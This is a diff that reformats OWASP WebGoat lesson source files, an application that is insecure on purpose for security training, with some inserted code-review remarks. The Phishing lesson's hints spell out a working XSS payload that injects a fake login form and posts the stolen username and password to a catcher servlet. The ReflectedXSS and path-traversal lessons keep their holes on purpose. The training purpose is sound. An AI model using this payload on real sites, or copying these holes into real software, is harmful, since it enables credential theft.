+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ * - * @author Sherif Koussa Macadamian Technologies. - * @created October 28, 2003 + * @author Sherif Koussa Macadamian Technologies. + * @created October 28, 2003 */ public class NewLesson extends LessonAdapter { - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - return super.createContent(s); - //makeSuccess(s); - //ec.addElement(new StringElement("Welcome to the WebGoat hall of fame !!")); - //return (ec); - } + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) + { + return super.createContent(s); + // makeSuccess(s); + // ec.addElement(new StringElement("Welcome to the WebGoat hall of fame !!")); + // return (ec); + } + /** + * Gets the category attribute of the NEW_LESSON object + * + * @return The category value + */ + protected Category getDefaultCategory() + { + return Category.GENERAL; + } - /** - * Gets the category attribute of the NEW_LESSON object - * - * @return The category value - */ - protected Category getDefaultCategory() - { - return Category.GENERAL; - } + private final static Integer DEFAULT_RANKING = new Integer(85); - private final static Integer DEFAULT_RANKING = new Integer(85); + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } + /** 
+ * Gets the title attribute of the DirectoryScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("Create a WebGoat Lesson"); + } - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - /** - * Gets the title attribute of the DirectoryScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Create a WebGoat Lesson"); - } - - public Element getCredits() - { - return super.getCustomCredits("Created by: Your name goes here!", new StringElement("")); - } + public Element getCredits() + { + return super.getCustomCredits("Created by: Your name goes here!", new StringElement("")); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/PathBasedAccessControl.java b/main/project/JavaSource/org/owasp/webgoat/lessons/PathBasedAccessControl.java index 2ee358c52..f6e776b4d 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/PathBasedAccessControl.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/PathBasedAccessControl.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons; import java.io.BufferedReader; @@ -5,7 +6,6 @@ import java.io.File; import java.io.FileReader; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; 
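Review bot: `createContent` in `NewLesson` still carries three commented-out statements (`// makeSuccess(s);`, `// ec.addElement(...)`, `// return (ec);`) that reference an `ec` which no longer exists; the reformatting preserved them, and they should be deleted rather than reflowed. The Javadoc on the same method is the generator placeholder ("Description of the Method / Description of the Parameter") and the title accessor's comment names the wrong class ("Gets the title attribute of the DirectoryScreen object"); since this file is the template new lesson authors copy, those comments propagate. Suggested replacements: `/** Renders the default "how to create a lesson" page from LessonAdapter; replace with the lesson's own content. */` on `createContent`, and `/** Title shown above the control area for this lesson. */` on `getTitle`.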
@@ -14,36 +14,34 @@ import org.apache.ecs.html.HR; import org.apache.ecs.html.TD; import org.apache.ecs.html.TR; import org.apache.ecs.html.Table; - import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ * @@ -111,13 +109,15 @@ public class PathBasedAccessControl extends LessonAdapter s.setMessage("It appears that you are on the right track. " + "Commands that may compromise the operating system have been disabled. " + "You are only allowed to see one file in this directory. "); - } else if (upDirCount(file) > 3) + } + else if (upDirCount(file) > 3) { s.setMessage("Access denied"); s.setMessage("It appears that you are on the right track. " + "Commands that may compromise the operating system have been disabled. " + "You are only allowed to see files in the webgoat directory. "); - } else + } + else { illegalCommand = false; } @@ -153,16 +153,20 @@ public class PathBasedAccessControl extends LessonAdapter s.setMessage("Congratulations! Access to file allowed"); s.setMessage(" ==> " + Encoding.urlDecode(f.getCanonicalPath())); makeSuccess(s); - } else + } + else { s.setMessage("File is already in allowed directory - try again!"); s.setMessage(" ==> " + Encoding.urlDecode(f.getCanonicalPath())); } - } else if (file != null && file.length() != 0) + } + else if (file != null && file.length() != 0) { - s.setMessage("Access to file/directory \"" + Encoding.urlDecode(f.getCanonicalPath()) + s + .setMessage("Access to file/directory \"" + Encoding.urlDecode(f.getCanonicalPath()) + "\" denied"); - } else + } + else { // do nothing, probably entry screen } 
@@ -176,30 +180,21 @@ public class PathBasedAccessControl extends LessonAdapter ec.addElement(new HR().setWidth("100%")); ec.addElement("Viewing file: " + f.getCanonicalPath()); ec.addElement(new HR().setWidth("100%")); - if (f.length() > 80000) - { - throw new Exception("File is too large"); - } + if (f.length() > 80000) { throw new Exception("File is too large"); } String fileData = getFileText(new BufferedReader(new FileReader(f)), false); - if (fileData.indexOf(0x00) != -1) - { - throw new Exception("File is binary"); - } - ec - .addElement(new StringElement(fileData.replaceAll(System.getProperty("line.separator"), - "
").replaceAll("(?s)", "").replaceAll("

", "
") - .replaceAll("
\\s
", "
").replaceAll("<\\?", "<").replaceAll( - "<(r|u|t)", "<$1"))); - } - catch (Exception e) + if (fileData.indexOf(0x00) != -1) { throw new Exception("File is binary"); } + ec.addElement(new StringElement(fileData.replaceAll(System.getProperty("line.separator"), "
") + .replaceAll("(?s)", "").replaceAll("

", "
") + .replaceAll("
\\s
", "
").replaceAll("<\\?", "<").replaceAll("<(r|u|t)", + "<$1"))); + } catch (Exception e) { ec.addElement(new BR()); ec.addElement("The following error occurred while accessing the file: <"); ec.addElement(e.getMessage()); } } - } - catch (Exception e) + } catch (Exception e) { s.setMessage("Error generating " + this.getClass().getName()); e.printStackTrace(); diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java b/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java index 64b9a3213..f529f9e77 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java @@ -1,8 +1,8 @@ + package org.owasp.webgoat.lessons; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; 
@@ -20,32 +20,31 @@ import org.owasp.webgoat.Catcher; import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ * @@ -70,8 +69,8 @@ public class Phishing extends LessonAdapter */ private boolean postedCredentials(WebSession s) { - String postedToCookieCatcher = - getLessonTracker(s).getLessonProperties().getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING); + String postedToCookieCatcher = getLessonTracker(s).getLessonProperties().getProperty(Catcher.PROPERTY, + Catcher.EMPTY_STRING); // return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING)); @@ -100,8 +99,7 @@ public class Phishing extends LessonAdapter { makeSuccess(s); } - } - catch (Exception e) + } catch (Exception e) { s.setMessage("Error generating " + this.getClass().getName()); } @@ -169,66 +167,65 @@ public class Phishing extends LessonAdapter { List hints = new ArrayList(); hints.add("Try adding HTML to the search field to create a fake authentication form.
" - + "Try to make the form look official."); + + "Try to make the form look official."); hints .add("Try:
" - + "password<form><br><br><HR><H3>This feature requires account login:</H2" - + "><br><br>Enter Username:<br><input type="text" id="user" " - + "name="user"><br>Enter Password:<br><input type="password" " - + "name = "pass"><br></form><br><br><HR>"); + + "password<form><br><br><HR><H3>This feature requires account login:</H2" + + "><br><br>Enter Username:<br><input type="text" id="user" " + + "name="user"><br>Enter Password:<br><input type="password" " + + "name = "pass"><br></form><br><br><HR>"); hints .add("Add functionality that can post a request, a button might work

" - + "After getting the button on the page, don't forget you will need to steal the credentials and post them to:
" - + "http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE"); + + "After getting the button on the page, don't forget you will need to steal the credentials and post them to:
" + + "http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE"); hints .add("Try:
" - + "<input type="submit" name="login" " - + "value="login">" - + "

Solution for this hint:

" - + "password<form><br><br><HR><H3>This feature requires account login:</H2" - + "><br><br>Enter Username:<br><input type="text" id="user" " - + "name="user"><br>Enter Password:<br><input type="password" " - + "name = "pass"><br><input type="submit" name="login" " - + "value="login" onclick="hack()"></form><br><br><HR>"); + + "<input type="submit" name="login" " + + "value="login">" + + "

Solution for this hint:

" + + "password<form><br><br><HR><H3>This feature requires account login:</H2" + + "><br><br>Enter Username:<br><input type="text" id="user" " + + "name="user"><br>Enter Password:<br><input type="password" " + + "name = "pass"><br><input type="submit" name="login" " + + "value="login" onclick="hack()"></form><br><br><HR>"); hints .add("Make the button perform an action on submit,
" - + "adding an onclick=\"hack()\" might work
" - + "Don't forget to add the hack() javascript function" - + "

Solution for this hint:

" - + "password<form><br><br><HR><H3>This feature requires account login:</H2" - + "><br><br>Enter Username:<br><input type="text" id="user" " - + "name="user"><br>Enter Password:<br><input type="password" " - + "name = "pass"><br><input type="submit" name="login" " - + "value="login" onclick="hack()"></form><br><br><HR>"); + + "adding an onclick=\"hack()\" might work
" + + "Don't forget to add the hack() javascript function" + + "

Solution for this hint:

" + + "password<form><br><br><HR><H3>This feature requires account login:</H2" + + "><br><br>Enter Username:<br><input type="text" id="user" " + + "name="user"><br>Enter Password:<br><input type="password" " + + "name = "pass"><br><input type="submit" name="login" " + + "value="login" onclick="hack()"></form><br><br><HR>"); hints .add("You need to create the hack() function. This function will pull the credentials from the " - + "webpage and post them to the WebGoat catcher servlet.
" - + "
Some useful code snippets:
    " - + "
  • doucument.forms[0].user.value - will access the user field" - + "
  • XssImage = new Image(); XssImage.src=SOME_URL = will perform a post" - + "
  • javascript string concatentation uses a \"+\"
" - + "

Solution for this hint():

" - + "password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen." - + "\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); " - + "XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+" - + "document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}" - + "</script>"); + + "webpage and post them to the WebGoat catcher servlet.
" + + "
Some useful code snippets:
    " + + "
  • doucument.forms[0].user.value - will access the user field" + + "
  • XssImage = new Image(); XssImage.src=SOME_URL = will perform a post" + + "
  • javascript string concatentation uses a \"+\"
" + + "

Solution for this hint():

" + + "password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen." + + "\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); " + + "XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+" + + "document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}" + + "</script>"); hints .add("Complete solution for this lesson:

" - + "password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen." - + "\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); " - + "XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+" - + "document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}" - + "</script><form><br><br><HR><H3>This feature requires account login:</H2" - + "><br><br>Enter Username:<br><input type="text" id="user" " - + "name="user"><br>Enter Password:<br><input type="password" " - + "name = "pass"><br><input type="submit" name="login" " - + "value="login" onclick="hack()"></form><br><br><HR>" - + "

You may need to remove the '.' from the http://localhost./"); + + "password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen." + + "\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); " + + "XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+" + + "document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}" + + "</script><form><br><br><HR><H3>This feature requires account login:</H2" + + "><br><br>Enter Username:<br><input type="text" id="user" " + + "name="user"><br>Enter Password:<br><input type="password" " + + "name = "pass"><br><input type="submit" name="login" " + + "value="login" onclick="hack()"></form><br><br><HR>" + + "

You may need to remove the '.' from the http://localhost./"); /** - * password

@@ -257,14 +254,13 @@ public class Phishing extends LessonAdapter */ public String getInstructions(WebSession s) { - String instructions = - "This lesson is an example of how a website might support a phishing attack

" - + "Below is an example of a standard search feature.
" - + "Using XSS and HTML insertion, your goal is to:
    " - + "
  • Insert html to that requests credentials" - + "
  • Add javascript to actually collect the credentials" - + "
  • Post the credentials to http://localhost./WebGoat/catcher?PROPERTY=yes...
" - + "To pass this lesson, the credentials must be posted to the catcher servlet.
"; + String instructions = "This lesson is an example of how a website might support a phishing attack

" + + "Below is an example of a standard search feature.
" + + "Using XSS and HTML insertion, your goal is to:
    " + + "
  • Insert html to that requests credentials" + + "
  • Add javascript to actually collect the credentials" + + "
  • Post the credentials to http://localhost./WebGoat/catcher?PROPERTY=yes...
" + + "To pass this lesson, the credentials must be posted to the catcher servlet.
"; return (instructions); } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RandomLessonAdapter.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RandomLessonAdapter.java index 402757a83..f45d1951e 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/RandomLessonAdapter.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RandomLessonAdapter.java 
@@ -1,56 +1,67 @@ + package org.owasp.webgoat.lessons; import org.owasp.webgoat.session.LessonTracker; import org.owasp.webgoat.session.RandomLessonTracker; import org.owasp.webgoat.session.WebSession; -public abstract class RandomLessonAdapter extends LessonAdapter { + +public abstract class RandomLessonAdapter extends LessonAdapter +{ public abstract String[] getStages(); - - public void setStage(WebSession s, String stage) { + + public void setStage(WebSession s, String stage) + { getLessonTracker(s).setStage(stage); } - - public String getStage(WebSession s) { + + public String getStage(WebSession s) + { return getLessonTracker(s).getStage(); } - - public void setStageComplete(WebSession s, String stage) { + + public void setStageComplete(WebSession s, String stage) + { RandomLessonTracker lt = getLessonTracker(s); lt.setStageComplete(stage, true); - if (lt.getCompleted()) { + if (lt.getCompleted()) + { s.setMessage("Congratulations, you have completed this lab"); - } else { + } + else + { s.setMessage("You have completed " + stage + "."); - if (! 
stage.equals(lt.getStage())) - s.setMessage(" Welcome to " + lt.getStage()); + if (!stage.equals(lt.getStage())) s.setMessage(" Welcome to " + lt.getStage()); } } - - public boolean isStageComplete(WebSession s, String stage) { + + public boolean isStageComplete(WebSession s, String stage) + { return getLessonTracker(s).hasCompleted(stage); } - - @Override - public RandomLessonTracker getLessonTracker(WebSession s) { - return (RandomLessonTracker) super.getLessonTracker(s); - } - @Override - public RandomLessonTracker getLessonTracker(WebSession s, AbstractLesson lesson) { + public RandomLessonTracker getLessonTracker(WebSession s) + { + return (RandomLessonTracker) super.getLessonTracker(s); + } + + @Override + public RandomLessonTracker getLessonTracker(WebSession s, AbstractLesson lesson) + { return (RandomLessonTracker) super.getLessonTracker(s, lesson); } - @Override - public RandomLessonTracker getLessonTracker(WebSession s, String userNameOverride) { + public RandomLessonTracker getLessonTracker(WebSession s, String userNameOverride) + { return (RandomLessonTracker) super.getLessonTracker(s, userNameOverride); } @Override - public LessonTracker createLessonTracker() { + public LessonTracker createLessonTracker() + { return new RandomLessonTracker(getStages()); } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ReflectedXSS.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ReflectedXSS.java index 15523c047..ec3d1b06f 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/ReflectedXSS.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ReflectedXSS.java @@ -1,9 +1,9 @@ + package org.owasp.webgoat.lessons; import java.util.ArrayList; import java.util.List; import java.util.regex.Pattern; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.html.BR; 
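Review bot: `if (!stage.equals(lt.getStage())) s.setMessage(" Welcome to " + lt.getStage());` in `setStageComplete` is now the only braceless conditional in the class after a reformat that added Allman braces to every other `if`/`else`; put the condition on its own line and wrap `s.setMessage(" Welcome to " + lt.getStage());` in `{` `}` like its siblings. In this collapsed view it is also not certain that `@Override` survives on each of the three `getLessonTracker` overloads on the new side — the `getLessonTracker(WebSession s, String userNameOverride)` overload shows a removed `@Override` with no added one nearby — so it is worth confirming every overload still carries the annotation, since that is what catches a signature drift against `LessonAdapter`.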
@@ -19,276 +19,248 @@ import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.WebSession; import org.owasp.webgoat.util.HtmlEncoder; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Bruce Mayhew WebGoat - * @created October 28, 2003 + * + * @author Bruce Mayhew WebGoat + * @created October 28, 2003 */ public class ReflectedXSS extends LessonAdapter { - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ - protected Element createContent(WebSession s) - { - - ElementContainer ec = new ElementContainer(); - String regex1 = "^[0-9]{3}$";// any three digits - Pattern pattern1 = Pattern.compile(regex1); - - try + protected Element createContent(WebSession s) { - String param1 = s.getParser().getRawParameter("field1", "111"); - String param2 = HtmlEncoder.encode(s.getParser().getRawParameter( - "field2", "4128 3214 0002 1999")); - float quantity = 1.0f; - float total = 0.0f; - float runningTotal = 0.0f; - // test input field1 - if (!pattern1.matcher(param1).matches()) - { - if (param1.toLowerCase().indexOf("script") != -1) + ElementContainer ec = new ElementContainer(); + String regex1 = "^[0-9]{3}$";// any three digits + Pattern pattern1 = Pattern.compile(regex1); + + try { - makeSuccess(s); + String param1 = s.getParser().getRawParameter("field1", "111"); + String param2 = HtmlEncoder.encode(s.getParser().getRawParameter("field2", "4128 3214 0002 1999")); + float quantity = 1.0f; + float total = 0.0f; 
+ float runningTotal = 0.0f; + + // test input field1 + if (!pattern1.matcher(param1).matches()) + { + if (param1.toLowerCase().indexOf("script") != -1) + { + makeSuccess(s); + } + + s.setMessage("Whoops! You entered " + param1 + " instead of your three digit code. Please try again."); + } + + // FIXME: encode output of field2, then s.setMessage( field2 ); + + ec.addElement(new HR().setWidth("90%")); + ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart "))); + Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center"); + + if (s.isColor()) + { + t.setBorder(1); + } + + TR tr = new TR(); + tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("80%")); + tr.addElement(new TH().addElement("Price").setWidth("10%")); + tr.addElement(new TH().addElement("Quantity").setWidth("3%")); + tr.addElement(new TH().addElement("Total").setWidth("7%")); + t.addElement(tr); + + tr = new TR(); + tr.addElement(new TD().addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry ")); + tr.addElement(new TD().addElement("69.99").setAlign("right")); + tr.addElement(new TD().addElement( + new Input(Input.TEXT, "QTY1", s.getParser().getStringParameter("QTY1", + "1"))) + .setAlign("right")); + quantity = s.getParser().getFloatParameter("QTY1", 0.0f); + total = quantity * 69.99f; + runningTotal += total; + tr.addElement(new TD().addElement("$" + total)); + t.addElement(tr); + tr = new TR(); + tr.addElement(new TD().addElement("Dynex - Traditional Notebook Case")); + tr.addElement(new TD().addElement("27.99").setAlign("right")); + tr.addElement(new TD().addElement( + new Input(Input.TEXT, "QTY2", s.getParser().getStringParameter("QTY2", + "1"))) + .setAlign("right")); + quantity = s.getParser().getFloatParameter("QTY2", 0.0f); + total = quantity * 27.99f; + runningTotal += total; + tr.addElement(new TD().addElement("$" + total)); + t.addElement(tr); + tr = new TR(); + 
tr.addElement(new TD().addElement("Hewlett-Packard - Pavilion Notebook with Intel Centrino")); + tr.addElement(new TD().addElement("1599.99").setAlign("right")); + tr.addElement(new TD().addElement( + new Input(Input.TEXT, "QTY3", s.getParser().getStringParameter("QTY3", + "1"))) + .setAlign("right")); + quantity = s.getParser().getFloatParameter("QTY3", 0.0f); + total = quantity * 1599.99f; + runningTotal += total; + tr.addElement(new TD().addElement("$" + total)); + t.addElement(tr); + tr = new TR(); + tr.addElement(new TD().addElement("3 - Year Performance Service Plan $1000 and Over ")); + tr.addElement(new TD().addElement("299.99").setAlign("right")); + + tr.addElement(new TD().addElement( + new Input(Input.TEXT, "QTY4", s.getParser().getStringParameter("QTY4", + "1"))) + .setAlign("right")); + quantity = s.getParser().getFloatParameter("QTY4", 0.0f); + total = quantity * 299.99f; + runningTotal += total; + tr.addElement(new TD().addElement("$" + total)); + t.addElement(tr); + + ec.addElement(t); + + t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); + + if (s.isColor()) + { + t.setBorder(1); + } + + ec.addElement(new BR()); + + tr = new TR(); + tr.addElement(new TD().addElement("The total charged to your credit card:")); + tr.addElement(new TD().addElement("$" + runningTotal)); + tr.addElement(new TD().addElement(ECSFactory.makeButton("Update Cart"))); + t.addElement(tr); + tr = new TR(); + tr.addElement(new TD().addElement(" ").setColSpan(2)); + t.addElement(tr); + tr = new TR(); + tr.addElement(new TD().addElement("Enter your credit card number:")); + tr.addElement(new TD().addElement(new Input(Input.TEXT, "field2", param2))); + t.addElement(tr); + tr = new TR(); + tr.addElement(new TD().addElement("Enter your three digit access code:")); + tr.addElement(new TD().addElement("")); + // tr.addElement(new TD().addElement(new Input(Input.TEXT, "field1",param1))); + t.addElement(tr); + + Element b = 
ECSFactory.makeButton("Purchase"); + tr = new TR(); + tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("center")); + t.addElement(tr); + + ec.addElement(t); + ec.addElement(new BR()); + ec.addElement(new HR().setWidth("90%")); + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); } - - s - .setMessage("Whoops! You entered " - + param1 - + " instead of your three digit code. Please try again."); - } - - // FIXME: encode output of field2, then s.setMessage( field2 ); - - ec.addElement(new HR().setWidth("90%")); - ec.addElement(new Center().addElement(new H1() - .addElement("Shopping Cart "))); - Table t = new Table().setCellSpacing(0).setCellPadding(2) - .setBorder(1).setWidth("90%").setAlign("center"); - - if (s.isColor()) - { - t.setBorder(1); - } - - TR tr = new TR(); - tr.addElement(new TH().addElement( - "Shopping Cart Items -- To Buy Now").setWidth("80%")); - tr.addElement(new TH().addElement("Price").setWidth("10%")); - tr.addElement(new TH().addElement("Quantity").setWidth("3%")); - tr.addElement(new TH().addElement("Total").setWidth("7%")); - t.addElement(tr); - - tr = new TR(); - tr - .addElement(new TD() - .addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry ")); - tr.addElement(new TD().addElement("69.99").setAlign("right")); - tr.addElement(new TD().addElement( - new Input(Input.TEXT, "QTY1", s.getParser() - .getStringParameter("QTY1", "1"))) - .setAlign("right")); - quantity = s.getParser().getFloatParameter("QTY1", 0.0f); - total = quantity * 69.99f; - runningTotal += total; - tr.addElement(new TD().addElement("$" + total)); - t.addElement(tr); - tr = new TR(); - tr.addElement(new TD() - .addElement("Dynex - Traditional Notebook Case")); - tr.addElement(new TD().addElement("27.99").setAlign("right")); - tr.addElement(new TD().addElement( - new Input(Input.TEXT, "QTY2", s.getParser() - .getStringParameter("QTY2", "1"))) - .setAlign("right")); - quantity = 
s.getParser().getFloatParameter("QTY2", 0.0f); - total = quantity * 27.99f; - runningTotal += total; - tr.addElement(new TD().addElement("$" + total)); - t.addElement(tr); - tr = new TR(); - tr - .addElement(new TD() - .addElement("Hewlett-Packard - Pavilion Notebook with Intel Centrino")); - tr.addElement(new TD().addElement("1599.99").setAlign("right")); - tr.addElement(new TD().addElement( - new Input(Input.TEXT, "QTY3", s.getParser() - .getStringParameter("QTY3", "1"))) - .setAlign("right")); - quantity = s.getParser().getFloatParameter("QTY3", 0.0f); - total = quantity * 1599.99f; - runningTotal += total; - tr.addElement(new TD().addElement("$" + total)); - t.addElement(tr); - tr = new TR(); - tr - .addElement(new TD() - .addElement("3 - Year Performance Service Plan $1000 and Over ")); - tr.addElement(new TD().addElement("299.99").setAlign("right")); - - tr.addElement(new TD().addElement( - new Input(Input.TEXT, "QTY4", s.getParser() - .getStringParameter("QTY4", "1"))) - .setAlign("right")); - quantity = s.getParser().getFloatParameter("QTY4", 0.0f); - total = quantity * 299.99f; - runningTotal += total; - tr.addElement(new TD().addElement("$" + total)); - t.addElement(tr); - - ec.addElement(t); - - t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0) - .setWidth("90%").setAlign("center"); - - if (s.isColor()) - { - t.setBorder(1); - } - - ec.addElement(new BR()); - - tr = new TR(); - tr.addElement(new TD() - .addElement("The total charged to your credit card:")); - tr.addElement(new TD().addElement("$" + runningTotal)); - tr.addElement(new TD().addElement(ECSFactory - .makeButton("Update Cart"))); - t.addElement(tr); - tr = new TR(); - tr.addElement(new TD().addElement(" ").setColSpan(2)); - t.addElement(tr); - tr = new TR(); - tr - .addElement(new TD() - .addElement("Enter your credit card number:")); - tr.addElement(new TD().addElement(new Input(Input.TEXT, "field2", - param2))); - t.addElement(tr); - tr = new TR(); - tr.addElement(new TD() - 
